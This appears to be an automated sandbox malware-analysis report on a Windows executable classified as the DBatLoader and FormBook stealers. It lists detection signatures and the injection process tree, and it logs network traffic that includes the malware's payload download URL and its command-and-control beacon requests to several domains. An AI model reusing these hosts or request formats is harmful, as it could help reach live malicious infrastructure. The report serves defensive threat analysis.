Windows Analysis Report
z10982283782.exe

Overview

General Information

Sample name: z10982283782.exe
Analysis ID: 1539808
MD5: 3138edfdc34f754c5f31088f00ae239d
SHA1: 2251e5474cc5af3619f99ee9c6c0042c10b089a6
SHA256: a1f257ec69c19785880ec7a051e3a4030a2edf055fd2e00f7f7f58c43d563cac
Tags: exe, user-Porcupine

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • z10982283782.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\z10982283782.exe" MD5: 3138EDFDC34F754C5F31088F00AE239D)
    • colorcpl.exe (PID: 4516 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • ObMmiCfBgqmt.exe (PID: 1312 cmdline: "C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • takeown.exe (PID: 3964 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • ObMmiCfBgqmt.exe (PID: 484 cmdline: "C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1732 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
Malware configuration (DBatLoader): {"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw"]}
Source | Rule | Description | Author | Strings
0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c150:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1423f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e2ea:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163d9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
10.2.colorcpl.exe.65f0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
10.2.colorcpl.exe.65f0000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
10.2.colorcpl.exe.65f0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
10.2.colorcpl.exe.65f0000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.z10982283782.exe.2a90000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T07:02:49.845749+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49878 | 3.33.130.190 | 80 | TCP
2024-10-23T07:03:21.450730+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 59651 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:35.010762+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 59655 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:50.377967+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 59659 | 154.23.184.240 | 80 | TCP
2024-10-23T07:04:04.448344+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 59663 | 194.58.112.174 | 80 | TCP
2024-10-23T07:04:18.810436+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 59667 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T07:03:06.830909+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59633 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:09.378022+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59644 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:11.940326+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59650 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:27.366251+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59652 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:29.881280+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59653 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:32.440366+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59654 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:41.737445+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59656 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:44.799857+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59657 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:47.347468+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59658 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:56.709964+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59660 | 194.58.112.174 | 80 | TCP
2024-10-23T07:03:59.356558+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59661 | 194.58.112.174 | 80 | TCP
2024-10-23T07:04:01.912056+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59662 | 194.58.112.174 | 80 | TCP
2024-10-23T07:04:10.480043+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59664 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:13.017875+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59665 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:16.229747+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59666 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:25.362597+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 59668 | 203.90.227.88 | 80 | TCP

AV Detection

Source: z10982283782.exe | Avira: detected
Source: z10982283782.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw"]}
Source: z10982283782.exe | ReversingLabs: Detection: 52%
Source: z10982283782.exe | Virustotal: Detection: 54%
Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: z10982283782.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 54.231.236.129:443 -> 192.168.2.7:49713 version: TLS 1.2
              Source: Binary string: colorcpl.pdbGCTL source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: takeown.pdbGCTL source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ObMmiCfBgqmt.exe, 0000000C.00000002.2488106778.00000000004BE000.00000002.00000001.01000000.00000008.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2489652502.00000000004BE000.00000002.00000001.01000000.00000008.sdmp
              Source: Binary string: easinvoker.pdb source: z10982283782.exe, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: takeown.pdb source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: z10982283782.exe, 00000000.00000002.1351975173.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236423933.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02A95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA | 0_2_02A95908
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_0068C5F0 FindFirstFileW,FindNextFileW,FindClose | 13_2_0068C5F0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop edi | 10_2_06608934
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 4x nop then xor eax, eax | 13_2_00679B80
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 4x nop then pop edi | 13_2_006859B1
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 4x nop then mov ebx, 00000004h | 13_2_00CE04E8

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49878 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59651 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59660 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59653 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59633 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59665 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59658 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59650 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59664 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59667 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59661 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59668 -> 203.90.227.88:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59655 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59656 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59652 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59654 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59657 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59666 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59659 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59644 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59662 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59663 -> 194.58.112.174:80
Source: Malware configuration extractor | URLs: https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw
Source: DNS query: www.joshcharlesfitness.xyz
Source: DNS query: www.98080753.xyz
Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAE4B8 InternetCheckConnectionA | 0_2_02AAE4B8
Source: Joe Sandbox View | IP Address: 185.166.143.48
Source: Joe Sandbox View | IP Address: 154.23.184.240
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: COGENT-174US
Source: Joe Sandbox View | ASN Name: TELUS-3CA
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5HI%2BmoxQQqA%2FJoPRSnjgCdSSRSG6OGZM7%2Bk14Fj0UPjRL0yvo%2FNoM0PqoD64CRp88RIYyjGI8Iyik85Wg%3D%3D&Expires=1729661485 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
Source: global traffic | HTTP traffic detected: GET /f2m8/?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld HTTP/1.1 | Host: www.joshcharlesfitness.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Source: global traffic | HTTP traffic detected: GET /dc1u/?fvM8Gh=fFgJrpU7aD7UkZlQpUegXiYX0mHuwd+xKsDAURMBiAqiBmSaSKvvh09Aihxa8ofx/ezcm777pnsov1VcpLBlwmC3Iqy+K+pafl2LF2kBMm3CKkFZyMytkoTfA5EUxo7rNsMcOhPX02Mw&DfDx=AFrxfzcH-Ld HTTP/1.1 | Host: www.facaicloud.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Source: global traffic | HTTP traffic detected: GET /eth5/?DfDx=AFrxfzcH-Ld&fvM8Gh=rP5P45xZZ1/7FcUVVUJeza+IVqMoIQCjuRWKRMBKl26wwcm/v5roWtgm33BJF8xpb4kfp7QdHQmzbzTt1acSQ4mCbwyezktofLwADktY5A3eXEgsMSOExa06ByFNIL6LLeLE9sVmxY4B HTTP/1.1 | Host: www.98080753.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Source: global traffic | HTTP traffic detected: GET /u071/?fvM8Gh=bBJc85dRrz6VYFP8GwFXoZFtfmuQO+iyQ8ywsDhPMj3PkpaAJncRlOwVGrcs7/oiPMEubiNmeHgqiRXMS1H3OK+Zq7VhNcw4P6d6BN/xAJTWHzjowpdO9JjlTFWXwfVVhN461s++G65d&DfDx=AFrxfzcH-Ld HTTP/1.1 | Host: www.wcp58.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Source: global traffic | HTTP traffic detected: GET /muj9/?fvM8Gh=hgXo7easQgYwzYM50VVsBbrTpvYmtRva0zGF6x/wVx5xdFtAh4cdAJarj8a6/VZ0fLckawx66xls7kEuRRfHglkiUnpuSxGF6OqSwfVcl2N6vBJ8grdIeIpeinnOhUKuNcVRLIFrNYJr&DfDx=AFrxfzcH-Ld HTTP/1.1 | Host: www.cpamerix.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Source: global traffic | HTTP traffic detected: GET /t67j/?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld HTTP/1.1 | Host: www.lotus9.life | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS traffic detected: DNS query: www.joshcharlesfitness.xyz
Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: www.facaicloud.top
Source: global traffic | DNS traffic detected: DNS query: www.98080753.xyz
Source: global traffic | DNS traffic detected: DNS query: www.wcp58.top
Source: global traffic | DNS traffic detected: DNS query: www.cpamerix.online
Source: global traffic | DNS traffic detected: DNS query: www.lotus9.life
Source: global traffic | DNS traffic detected: DNS query: www.g4s7e5.biz
